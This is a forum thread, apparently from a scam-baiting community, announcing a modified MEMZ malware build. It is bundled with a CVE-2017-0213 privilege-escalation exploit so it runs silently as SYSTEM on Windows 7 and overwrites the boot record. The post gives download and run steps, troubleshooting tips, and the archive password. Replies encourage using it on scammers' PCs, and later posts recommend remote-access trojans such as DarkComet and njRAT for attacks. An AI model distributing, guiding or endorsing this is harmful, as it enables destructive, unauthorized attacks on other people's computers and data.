Enhanced MEMZ

Hey Guys!

I’ve recently watched this video from @ScammerRevolts and was really happy to see this scammer’s PC being infected with WannaCry. Unfortunately the scammer didn’t click on the admin popup from MEMZ, so only WannaCry was running.

This was the moment when I thought: “It must be possible to start MEMZ as easily as WannaCry, without user input.”

And today, I can present you this: MEMZ-Destructive v5.0
This version of MEMZ doesn’t have a silly warning like “THIS IS CONSIDERED MALWARE”! No, it simply starts and does its thing. Even without an admin popup!

But how does it work?

I’ve combined MEMZ with an exploit for CVE-2017-0213, which works on Win7 and starts MEMZ with NT AUTHORITY/SYSTEM rights. Not even the Task Manager can close MEMZ if the privileges are elevated this high.

And now for the most important part: How to use it?

  1. Step: Download from the link above (Warning: This is malware. DO NOT EVER RUN THIS ON YOUR REAL PC! I am not responsible for anything you do with MEMZ.)
  2. Step: There are several files in a .zip file, encrypted using a password so that you can’t extract and run them by mistake (pass included in the .zip file). Extract the files.
  3. Step: Take the file that best fits the PC. There are both x86 and x64 versions.
    (Annotation: There are three MEMZ files in the .zip. The file called “MEMZ_NoGui” does not include the exploit and is there for testing/dev purposes.)
  4. Step: Enjoy!

TL;DR
Download from the Link and execute MEMZ_x86 or MEMZ_x64. Then the PC is f*cked.

IMPORTANT NOTICE (Troubleshooting)

The exploit is a bit unstable. I tested it on Win7 x86 Sp0/Sp1 and Win7 x64 Sp0. Should for some unknown reason MEMZ not work for you (or on the scammer’s PC), just do the following:

  • If there’s an admin prompt trying to open cmd.exe, ignore it. You can type yes, but that defies the reason I programmed this (we want this to work without user input)
  • Just give a double-click on “elevatex86.exe” (“elevatex64.exe”). Or two. Just smash that mouse button until it works (that really helps!!)

Happy Scammer-Hunting and PC-Trashing!
- Steve

4 Likes

haha nice! Funny thing is I just used the old version on a scammer XD ima have to try this one out.

1 Like

I would be really happy if I could see that in one of your videos! :grin: Hope that it works.

(And if not: Just tell me what happened/what didn’t happen and I’ll try to fix the error)

1 Like

Brilliant mate! Nice work indeed. :+1:

Does this just trash windows or whole PC?

Yah…Nice…You Should Do MEMZ Attack on More Scammers

MEMZ itself will first annoy the user really hard while overwriting the MBR/GPT on the hard drive with NyanCat. That means the data on the drive is still intact, but you can’t boot into Windows anymore. If you know what you’re doing it isn’t hard to restore Windows, but if you use MEMZ and WannaCry at the same time, the data will end up being encrypted while you can’t use your operating system anymore.

In any case, you indeed can use your PC after formatting everything and deleting all data, but the important part is that the scammers lose all their data and have a PC less to scam people with.

1 Like

I cannot seem to get it to work on Windows 10. I am not able to get it unlocked. I have been trying to get the password unlocked & use it on my virtual machine… Forgive me, I am still new to computers & intend to use this on the scammers. I also need a DarkComet for use against them & have not found a clean copy to put in my computer.

I’m still having trouble getting the files to open, allow me to use the password, on my Oracle VM. :(:frowning:

First of all: The new version is available in this post. Unfortunately the exploit isn’t intended to work on Windows 10 (because most of these scammers use Windows 7) but I’m currently working on it. The password for all the archives is “infected” (without quotation marks or spaces).

As for the DarkComet download, I can recommend this post from @ScammerRevolts as it is the only clean version I found so far.
You could also try other RATs like njRAT, Babylon RAT or Revenge RAT.

@Steve Great job on this! Can’t wait to see it in action against those scumbags.

Trying to find this clean version of DarkComet.
Is the link broken?